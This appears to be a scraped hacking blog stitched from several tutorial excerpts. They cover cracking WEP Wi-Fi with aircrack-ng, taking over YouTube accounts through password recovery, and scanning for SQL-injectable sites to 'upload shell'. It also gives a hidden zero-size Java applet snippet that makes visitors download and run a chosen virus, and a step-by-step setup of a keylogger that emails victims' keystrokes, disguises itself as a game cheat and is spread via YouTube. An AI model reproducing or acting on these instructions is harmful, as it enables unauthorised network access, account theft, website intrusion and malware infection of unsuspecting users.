Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...

[Image: aireplay12.png]

Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....

[Image: aireplay15.png]

Please, Say Thanks...
Read More

So let's Get Started:

1.The Very first thing you want to do is goto Http://www.youtube.com/ , And you want to sign out of your account if you are not already signed out.

2.Next you want to click on the sign in button,And it should come to the sign in page,that look's like this

[Image: part2.png]

3.Then you want to click on "I Can Not Access My Account",Then you should come to a page that look's like this.

[Image: part3.png]

4.Where it say's "Username Or Email" you wan't to enter in Something simple like Rogger@yopmail.com,The fir part of the email can be anything you prefer,though the email domain it self need's to be yopmail.com.

5.After you have entered it Click Submit!

6.After you do that you should come to a page that look's like this!
And you want to click on "i forgot my Password" And then click continue.

[Image: part4.png]

7.After you click on Continue,It should come to a Capaca page,And just enter the letter's or number's it give's you :D.And then click on Contiue,

8.Then you should come to a page that look's like this after you have entered the Capaca,IF YOU DO NOT ALREADY SEE THIS PAGE,THEN THERE SHOULD BE ANOTHER PAGE,THAT ASK YOU WHERE YOU WANT THEM TO SEND THE PASSWORD TO,YOU WANT TO CLICK ON SEND TO MY EMAIL :D.

[Image: part9.png]

9.After it say's it sent the link for a new password to your email,Then you want to go to,http://www.yopmail.com/ ,You should see this,


[Image: part10.png]

10.Where is say's "Check Email" you want to enter the Random email you used at the first of the tutorial.

11.Then Click on "Check Inbox",Then it should take you to your Inbox,Then in your inbox there should be a Email that say's "GOOGLE ACCOUNT RECOVERY",Click on that email,There should then be a long Link in there that look's something like this,

https://www.google.com/accounts/recovery...301D_1EzF8

12.Copy and paste that link into the address Bar at the top!

13.After you have copied and pasted the link into the Address bar,You should come to a password reset page that look's like this.

[Image: 16.png]

14.Then enter the new password you want for the account,And then click on "Reset Password",After that you are all done,All you need to do now is go to Http://www.youtube.com/ Click sign in and sign in with the email you used and the new password you set.

15.Now Enjoy your new account :D.

16.Thank's for Reading,Hope this helped :D.
Read More

| TUT How To Find Vulnerable Websites | TUT |

I thought i'd post this because using a tool like this is much quicker when wanting to do a quick SQLI. This tool is a little like havij but in my opinion better.

First off you need to download the actual tool itself (No this is not my own tool)
Download ;
Download here


Once you've downloaded the file above you need to extract it to a place you will know where to find it. A picture of the programme itself is below.

[Image: dnjFaQ.png]

NOTE- Make sure you don't extract the tool away from the folder because that's where the dorks are.

Ok so now for the tutorial, this is a little long but who ever said hacking was easy?, just simply follow these steps bellow and then you will be successful in "hacking" your opponent.

Step 1 -First you will need to click the "Scanner" tab and then the little "+" icon on the "All dorks". Once done you will see a list like this ;
[Image: Qwsb0M.png]
this is called a "dork" you can pick anyone you want by clicking the little "+" icon again.

Step 2 - Next you will need to pick a specific "dork" i'm going to be using ASP with dork ; ".asp?bookID=" you can use any....it really doesn't matter. So now our stage process should be as shown below.
[Image: hkZGIS.png]

Step 3 - Now you will need to press the scan button, I can't really explain this part so I got a picture for you, make sure to press "Remove duplicates".
[Image: RQBeM5.png]

Step 4 - Once completed "Step 3" the next thing you will need to do is right click your list (the white part) and press "Send to SQLI Crawler" as so.
[Image: aYNRVU.png]

Step 5 - Once in the SQLI Crawler you will need to press "Crawl" this will find you the vulnerable links from the ones you just just imported, this didn't work for me as good as I was hoping because I used a dork basically that doesn't find many vulnerable sites, this tutorial is just an example of what it'l be like. [Image: CvFT8o.png]

Step 6) Following on from "Step 5" the list takes a while because the tool itself is finding if its vulnerable or not. It should look a little like this [Image: JJIF4i.png]

Step 7 - Once your list is populated you have now got yourself some vulnerable sites to SQL inject/upload shell.

I would of continued the tutorial into more depth of executing SQL injection with this tool but there's already tutorials around that you can use. If you need any help with SQL injecting/uploading a shell just PM me, I'll be more than happy to help. I know you might think this tutorial is well pointless but it's a simple way of finding vulnerable websites whilst using some of the best dorks. Oh and before you guys say isn't it better just using "Google" well in my opinion no, this method tells you if its vulnerable and gives you over +50 sites at a time which will keep you busy.

I hope you liked this tutorial and remember whenever hacking/exploiting sites always use a proxy, here's a few proxy's that I use.
Read More

Wednesday, 4 April 2012

The client.jar file and the applet code is SinlorD's, so all credits for those goes to him.

Download
You'll only need one file, client.jar. The password for the archive is "s!oeV0Estl" (without the quotes).

Is the link dead? Please PM me.

Downloading a web page
Well, obviously we have a web page we want to download. In this example I'll be using http://www.google.com/. Right click anywhere on the page and click "save as". And save it to an empty folder. I'm using Chrome but I know firefox has a similar feature.

[Image: 5TLyX.png]

Editing the index file
Now open the folder where you saved the file. You'll see you'll have a file and a folder. Rename the file from whatever.htm to index.htm and accept any warning you may get.

Now open up index.htm in notepad. Scroll down to the very bottom of the page, make a new line and add this text:

Code:
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL">
</APPLET>

Replace "YOURVIRUSURL" with the link to your .exe virus.

[Image: VHv0D.png]

Save and close the file.

Placing the .jar file
Quick step, copy the client.jar you downloaded earlier to the same folder as the index.htm.

[Image: A1e5U.png]

That's it! Upload all of the files in the folder (including the folder "whatever_files" and the files you might have inside) to a webhost and begin spreading!
Read More

[NOOB FRIENDLY] Project Neptune Keylogger [TUT]

Project neptune is a very useful keylogger and has a lot of ways that you can customize your server. IMO it is one of the most useful (Free) Keyloggers out there.

Step 1.
Download Skyneos Keylogger
Project Neptune Website
This step is pretty self explanitory, just do what it shows in the picture.

[Image: a0Hau.png]

Step 2.
Create a Gmail Account
Go here to create one: gmail.com
And then click on the "Create An Account" button.

[Image: lROLG.png]

Or if you already have an account then you can skip this step.

Step 3.
Open the program
Double click on the program where you downloaded it.

[Image: pBueX.png]

Step 4.
Keystrokes
Once you are in check the button that says "Use Email for Storing Logs"
Then change the ammount of time the keylogger sends logs.
I would suggest making it higher than 20 minutes if you have a lot of slaves.
Keep the boxes checked that say "Delete Last Key On Backspace", "Capslock and Shift Capitilzation", "Log All Text on the Clipboard", or "Log All System Information/Specs"
Also don't do anything with the spaces that say "Header on Left Log Window Title" and "Header on Right Log Window Title"
In the Email settings tab keep the "smpt.gmail.com and the port number.
Where it says "Email to Send Keystorke Logs" put your email in that box
and in the box under that put the password to your email.
If you want you can change what email it send the logs too, but otherwise use the same email that you put above.
Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step.

[Image: NOWBq.png]

Step 5.
System Wide
Keep all the settings the same, unless you want to disable task manager or block websites. But to keep the suspicion level low I would keep the settings the same.

[Image: VRUtW.png]

Step 6.
Installation
Go to the installation tab and check the first box in "Startup Settings"
Then Choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the "System Files Folder" or the "Operating Windows Files Folder"
Then Where it says Origional File Check "Do Nothing WIth Origional File After Install" to keep suspicion level low.
If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

[Image: XrZJM.png]

Step 7.
Extra Options
When you are in this tab I would keep everything the same, unless you want a fake error, but you won't need a fake error if you are binding this with another program.

[Image: yInWO.png]

Step 8.
Server Creation
In the server settings I would recommend putting something here if you want to make it less suspicious. Put something that would make it look like the origional program. Like "Halo Cracked" or "Black Ops Aimbot", something like that.
Don't check "Copy File's Creation Date" or "Use File Icon" unless you have the premium version.
In the file pumping section I would increase it by 1000+ kb to make it less suspicious.
In the server generation tab, where it says "Mutual Exclusion (Mutex) String" after that hit the refresh button.
There it says automated cure password you can use the refresh button or you can type in a password of your choice.
Then, keep the process name as "iexplorer.exe"
Then hit the Generate New Server button and it will create a server for you.

[Image: f6ZKv.png]

Step 9.
File Binding
Click on the file binder tab.
Then right click in the open space and click add file and add your keylogger to the list.
Do the same thing for the program you want to bind this with.

[Image: rQ98P.png]

Step 10.
Spreading

Three Good Ways To Spread:

1. Youtube
Make a Youtube video and then post the link to your file in the description.
Read More